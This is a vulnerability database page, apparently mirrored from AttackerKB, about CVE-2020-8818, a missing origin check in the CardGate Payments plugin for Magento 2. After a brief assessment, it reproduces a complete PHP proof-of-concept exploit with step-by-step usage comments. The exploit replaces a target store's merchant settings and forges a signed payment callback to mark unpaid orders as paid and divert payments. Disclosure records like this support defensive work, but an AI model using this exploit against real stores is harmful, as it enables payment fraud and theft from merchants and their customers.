Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
attackerkbAttackerKBAKB:CDBCF1A3-F9B8-455F-8D83-3B80EF4B729D
HistoryFeb 25, 2020 - 12:00 a.m.

CVE-2020-8818

2020-02-2500:00:00
attackerkb.com
6

0.108 Low

EPSS

Percentile

95.1%

JSON

An issue was discovered in the CardGate Payments plugin through 2.0.30 for Magento 2. Lack of origin authentication in the IPN callback processing function in Controller/Payment/Callback.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.

Recent assessments:

kevthehermit at February 25, 2020 9:41am UTC reported:

This is related to <https://attackerkb.com/topics/cve-2020-8819&gt; It is the same plugin for a different platform and is vulnerable to the same

Magento does not provide an indication of how many websites have the plugins installed, but using the WooCommerce as a guide it is expected to be relatively low ~ 500 installs.

POC code is available in the github repo as part of the disclosure and is replicated at the end of this analysis for convenience.

At the time of this analysis, the Magento MarketPlace was still serving a vulnerable version. 2.0.30 – <https://marketplace.magento.com/cardgate-magento2.html&gt;

&lt;?php
/*
  Usage:

  1. Change values of the constants (see below for TARGET & ORDER*)
  2. Host this script somewhere (must be public accessible)
  3. Register a merchant at https://cardgate.com
  4. Sign into "My CardGate" dashboard
  5. Add fake site or choose existing one
  6. Click "Setup your Webshop" button in site preferences
  7. Paste the URL of this script into the pop-up window and click "Save"
  8. The target store now uses the settings of your site, enjoy :]

  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sToken_ 
 * @param bool $bTestmode_ 
 * @return string
 */
function pullConfig($sToken_, $bTestmode_ = FALSE) {
	if (!is_string($sToken_)) {
		throw new Exception('invalid token for settings pull: ' . $sToken_);
	}

	$sResource = "pullconfig/{$sToken_}/";
	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_URL, $sUrl);
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
		'Content-Type: application/json',
		'Accept: application/json'
	]);
	if ($bTestmode_) {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
	} else {
		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
	}

	if (FALSE == ($sResults = curl_exec($rCh))) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}
	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
		throw new Exception('remote gave invalid JSON: ' . $sResults);
	}
	if (isset($aResults['error'])) {
		throw new Exception($aResults['error']['message']);
	}

	return $aResults;
}

/**
 * Original function from CardGate API client library (SDK) with minor changes
 * @param string $sUrl 
 * @param array $aData_ 
 * @param string $sHttpMethod_ 
 * @return string
 */
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
		throw new Exception('invalid http method: ' . $sHttpMethod_);
	}

	$rCh = curl_init();
	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

	if ('POST' == $sHttpMethod_) {
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
		curl_setopt($rCh, CURLOPT_POST, TRUE);
		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
	} else {
		$sUrl = $sUrl
			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
			. http_build_query($aData_)
		;
		curl_setopt($rCh, CURLOPT_URL, $sUrl);
	}

	$response = curl_exec($rCh);
	if (FALSE == $response) {
		$sError = curl_error($rCh);
		curl_close($rCh);
		throw new Exception('Client.Request.Curl.Error: ' . $sError);
	} else {
		curl_close($rCh);
	}

	return $response;
}

if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
	try {
		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
		$aConfigData = $aResult['pullconfig']['content'];
		$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
		if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
			if (ORDER) {
				$payload = [
					'testmode' =&gt; $_REQUEST['testmode'],
					'reference' =&gt; ORDER,
					'transaction' =&gt; 'T' . str_pad(time(), 11, random_int(0, 9)),
					'currency' =&gt; ORDER_CURRENCY,
					'amount' =&gt; ORDER_AMOUNT * 100,
					'status' =&gt; 'success',
					'code' =&gt; 200,
					'pt' =&gt; ORDER_PAYMENT_TYPE
				];
				$payload['hash'] = md5(
					(!empty($payload['testmode']) ? 'TEST' : '')
					. $payload['transaction']
					. $payload['currency']
					. $payload['amount']
					. $payload['reference']
					. $payload['code']
					. $aConfigData['site_key']
				);
				$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
				if ($response == $payload['transaction'] . '.' . $payload['code']) {
					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
				} else {
					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
				}
			} else {
				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
			}
		} else {
			throw new Exception("It seems target is not vulnerable ($response)");
		}
	} catch (\Exception $oException_) {
		die(htmlspecialchars($oException_-&gt;getMessage()));
	}
}

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 3

Related

cve 2
prion 2
nvd 2
veracode 1
osv 4
packetstorm 2
exploitpack 2
github 2
exploitdb 2
cvelist 2
patchstack 1
wpvulndb 1
zdt 1
wpexploit 1
attackerkb 1
cve
cve
CVE-2020-8818
2020-02-25 02:15:12
CVE-2020-8819
2020-02-25 02:15:12
prion
prion
Authentication flaw
2020-02-25 02:15:00
Authentication flaw
2020-02-25 02:15:00
nvd
nvd
CVE-2020-8818
2020-02-25 02:15:12
CVE-2020-8819
2020-02-25 02:15:12
veracode
veracode
Authentication Bypass
2020-02-26 03:07:54
osv
osv
CVE-2020-8818
2020-02-25 02:15:12
Origin Validation Error in Magento 2
2021-10-12 16:30:58
CVE-2020-8819
2020-02-25 02:15:12
packetstorm
packetstorm
Magento WooCommerce CardGate Payment Gateway 2.0.30 Bypass
2020-02-25 00:00:00
WordPress WooCommerce CardGate Payment Gateway 3.1.15 Bypass
2020-02-25 00:00:00
exploitpack
exploitpack
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
2020-02-25 00:00:00
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
2020-02-25 00:00:00
github
github
Origin Validation Error in Magento 2
2021-10-12 16:30:58
CardGate Payments plugin for WooCommerce does not validate request origin
2022-05-24 17:09:38
exploitdb
exploitdb
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
2020-02-25 00:00:00
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
2020-02-25 00:00:00
cvelist
cvelist
CVE-2020-8818
2020-02-25 01:20:39
CVE-2020-8819
2020-02-25 01:15:55
patchstack
patchstack
WordPress CardGate Payments for WooCommerce plugin <= 3.1.15 - Payment Process Bypass vulnerability
2020-02-22 00:00:00
wpvulndb
wpvulndb
CardGate < 3.1.16 - Unauthorised Payments Hijacking and Order Status Spoofing
2020-02-22 00:00:00
zdt
zdt
WordPress WooCommerce CardGate Payment Gateway 3.1.15 Plugin - Payment Process Bypass Exploit
2020-02-26 00:00:00
wpexploit
wpexploit
CardGate < 3.1.16 - Unauthorised Payments Hijacking and Order Status Spoofing
2020-02-22 00:00:00
attackerkb
attackerkb
CVE-2020-8819
2020-02-25 00:00:00

0.108 Low

EPSS

Percentile

95.1%

JSON
Related for AKB:CDBCF1A3-F9B8-455F-8D83-3B80EF4B729D
cve2prion2nvd2veracode1osv4packetstorm2exploitpack2github2exploitdb2cvelist2patchstack1wpvulndb1zdt1wpexploit1attackerkb1